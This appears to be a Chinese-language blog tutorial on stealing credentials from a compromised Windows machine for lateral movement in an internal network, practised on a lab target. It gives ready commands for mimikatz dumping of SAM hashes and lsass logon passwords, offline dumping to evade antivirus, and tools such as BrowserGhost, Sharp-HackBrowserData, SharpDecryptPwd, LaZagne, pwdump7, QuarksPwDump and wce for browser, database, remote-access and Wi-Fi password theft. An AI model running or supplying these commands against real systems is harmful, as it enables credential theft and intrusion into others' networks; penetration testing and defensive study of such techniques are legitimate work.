admin管理员组

文章数量:1540703

Mimikatz在线读取SAM文件

离线读取SAM文件

在线读取lsass进程

离线读取lsass进程

BrowserGhost浏览器密码抓取

Sharp-HackBrowserData浏览器密码抓取

SharpDecryptPwd数据库密码抓取

LaZagne各类密码的抓取

Windows其他类型抓NTLM Hash工具


sam文件和lsass进程就是Windows存储本地密码的文件和进程,我们可以通过读取sam文件和lsass进程,可以获得本地的用户密码,从而进行内网横向

Mimikatz在线读取SAM文件:

首先上传工具

命令框输入:

mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

即可得到其他用户的NTLM Hash值和SID

离线读取SAM文件:

防止上传的工具被杀毒软件杀掉

1.先导出sam文件和system文件

2.将sam文件和system文件导出到本地

3.打开mimikatz读取SAM文件和system文件获取密码:

在线读取lsass进程:

上传工具mimikatz

命令:mimikatz sekurlsa::logonPasswords

得到用户的Hash 密码

离线读取lsass进程:

1.查看进程:

2.使用powershell导出进程:

然后将其导出到本地

mimikatz读取:

BrowserGhost浏览器抓取:只能抓谷歌

先上传工具,再抓取密码

命令:BrowserGhost.exe

因为靶机没有谷歌浏览器,所以不能抓到密码

Sharp-HackBrowserData浏览器抓取:

可以抓取微软,谷歌,Edge等等浏览器

先上传工具,再抓取密码

命令:Sharp-HackBrowserData.exe

SharpDecryptPwd数据库密码抓取:

 基本用法:

       SharpDecryptPwd.exe -NavicatCrypto
       SharpDecryptPwd.exe -TeamViewer
       SharpDecryptPwd.exe -FileZilla
       SharpDecryptPwd.exe -WinSCP
       SharpDecryptPwd.exe -Xmangager -p Session_Path (-s UserSid)
       SharpDecryptPwd.exe -Browser

命令:SharpDecryptPwd.exe -NavicatCrypto

靶机没有数据库,所有抓不到密码

LaZagne各类密码的抓取:

上传工具,执行命令

命令:laZagne.exe all

可以抓取到wifi密码等等

Windows其他类型抓NTLM Hash工具

1.pwdump7

在命令行环境中运行PwDump7程序,可以得到系统中所有账户的NTLMHash

命令:PwDump7.exe

2.QuarksPwDump:

下载QuarksPwDump.exe,在命令行环境中输人

命令:QuarksPwDump.exe --dump-hash-local 导出三个用户的NLMHash

3.wce:这款工具是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。这款工具也分为32位和64位两个不同的版本

命令 : wce.exe

本文标签: 内网密码